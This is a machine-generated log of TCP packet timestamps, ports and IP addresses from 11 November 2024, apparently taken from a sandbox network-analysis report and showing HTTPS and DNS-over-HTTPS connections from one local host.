                                                                                                                                                                                                        Nov 11, 2024 08:11:05.272686958 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.272897005 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.272942066 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.273143053 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.278351068 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284132957 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284269094 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284327030 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284380913 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.284574032 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.289846897 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.296036005 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.296322107 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.296371937 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299174070 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299309015 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299501896 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299556971 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.299820900 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.304668903 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306159973 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306294918 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306437016 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306492090 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.306761980 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.309561014 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313056946 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313199997 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313282013 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313334942 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.313586950 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.316776037 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322063923 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322201014 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322285891 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322341919 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.322530031 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.323642015 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.326864004 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.327002048 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.327069998 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.327138901 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.327398062 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.330219984 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.333607912 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.333748102 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.333892107 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.333956003 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.334152937 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.336908102 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.340217113 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.340353966 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.340492964 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.340548038 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.340856075 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.343440056 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.346703053 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.346914053 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.346947908 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.346987009 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.347131014 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.347192049 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.347204924 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.347215891 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.347244978 CET44349781172.217.215.132192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.347404003 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.347404003 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:05.347457886 CET49781443192.168.11.20172.217.215.132
                                                                                                                                                                                                        Nov 11, 2024 08:11:09.188663960 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:09.189948082 CET4976953279192.168.11.2087.120.114.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:09.463670015 CET532794976987.120.114.20192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:11.686825037 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:11.686877966 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:11.687737942 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:11.687932968 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:11.687973976 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.020724058 CET49762443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.020932913 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.020977974 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.021148920 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.021198034 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.021215916 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.161946058 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.162276983 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.168365955 CET4434976220.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.168623924 CET49762443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.173806906 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.173814058 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.174032927 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.175446987 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.175446987 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.175476074 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.481262922 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.481573105 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.485987902 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.485994101 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.486228943 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.486974955 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.487035036 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.487051010 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.487091064 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.487097979 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.512375116 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.512387037 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.512439966 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.512553930 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.512667894 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.512980938 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.512980938 CET49785443192.168.11.2040.126.29.12
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.512989998 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.512994051 CET4434978540.126.29.12192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.546108007 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.546124935 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.546569109 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.555942059 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.555954933 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829216003 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829226971 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829272985 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829365015 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829365015 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829510927 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829641104 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829641104 CET49786443192.168.11.2020.190.135.7
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829653025 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:12.829655886 CET4434978620.190.135.7192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.012353897 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.012659073 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.012667894 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.013451099 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.013659000 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.014530897 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.014620066 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.014807940 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.014816999 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.056586981 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.379827976 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.379842997 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.379889965 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.380040884 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.380043030 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.380254984 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.380407095 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.380616903 CET63505443192.168.11.2052.123.251.14
                                                                                                                                                                                                        Nov 11, 2024 08:11:13.380633116 CET4436350552.123.251.14192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.202097893 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.202119112 CET443607963.163.101.92192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.202260971 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.202754021 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.202768087 CET443607963.163.101.92192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.467073917 CET443607963.163.101.92192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.467669010 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.467691898 CET443607963.163.101.92192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.469569921 CET443607963.163.101.92192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.469763041 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.470998049 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.471155882 CET443607963.163.101.92192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.514369965 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.514385939 CET443607963.163.101.92192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:14.560578108 CET60796443192.168.11.203.163.101.92
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287137985 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287156105 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287228107 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287254095 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287374973 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287414074 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287452936 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287493944 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287493944 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287522078 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287583113 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287596941 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287633896 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287708998 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287738085 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287739038 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287745953 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287898064 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287908077 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.287929058 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288016081 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288036108 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288134098 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288146973 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288563013 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288569927 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288666964 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288676977 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288783073 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.288789988 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.528763056 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.529123068 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.529134035 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.529938936 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530071974 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530163050 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530189037 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530352116 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530493975 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530498981 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530631065 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530950069 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.530957937 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531277895 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531286001 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531388998 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531419039 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531465054 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.531784058 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532069921 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532078981 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532371998 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532438040 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532486916 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532509089 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532573938 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532582998 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532777071 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.532804012 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533082962 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533087015 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533135891 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533299923 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533312082 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533624887 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533627033 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533720970 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533766031 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533819914 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.533879995 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534089088 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534094095 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534290075 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534368038 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534425974 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534459114 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534502983 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.534729004 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535120010 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535206079 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535217047 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535583973 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535626888 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.535631895 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573795080 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573795080 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573801994 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573806047 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573827028 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573838949 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573872089 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.573884010 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.575958967 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.575961113 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.589432955 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.589432955 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.589437962 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.589441061 CET44360368172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.620660067 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.620712042 CET53091443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.620713949 CET57983443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.620742083 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.636326075 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.636326075 CET60368443192.168.11.20172.64.41.3
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762485027 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762514114 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762671947 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762697935 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762783051 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.762810946 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763019085 CET59315443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763047934 CET44359315149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763139009 CET64413443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763160944 CET44364413149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763708115 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.763845921 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.764070034 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.764158010 CET55810443192.168.11.20149.112.112.112
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.764180899 CET44355810149.112.112.112192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808159113 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808279991 CET44357983172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808417082 CET44353091172.64.41.3192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:11:17.808424950 CET57983443192.168.11.20172.64.41.3
